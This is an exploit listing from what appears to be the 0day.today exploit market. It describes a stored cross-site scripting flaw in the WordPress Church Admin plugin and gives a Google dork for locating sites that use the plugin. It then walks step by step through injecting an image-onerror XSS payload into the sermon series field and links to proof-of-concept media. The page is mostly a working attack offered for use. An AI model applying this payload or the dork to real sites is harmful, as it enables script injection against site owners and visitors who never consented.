[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Plugin Church Admin XSS Vulnerability

Author
CrashBandicot69
Risk
[
Security Risk Low
]
0day-ID
0day-ID-23368
Category
web applications
Date add
06-03-2015
Platform
windows
# Exploit Title: Wordpress Plugin Church Admin XSS Vulnerability
# Date: 2015-03-06
# Google Dork : inurl:wp-content\uploads\sermons
# Exploit Author: CrashBandicot
# Vendor Homepage: https://wordpress.org/plugins/church-admin/
# Tested on: Chrome
 
Go localhost/wp-admin/admin.php?page=church_admin/index.php

Click on "Upload or attach external sermon mp3 file" set random value in input
but in label "Create a new sermon series" in input sermon_series add this value :
 
"><img src=x onerror=alert(/xss/)>


And Save File & Refresh localhost/wp-admin/admin.php?page=church_admin%2Findex.php&action=list_files


# poC : http://i.imgur.com/69yMB2o.png
#       https://www.youtube.com/watch?v=LbnXMKwy2Zw

#  0day.today [2024-07-05]  #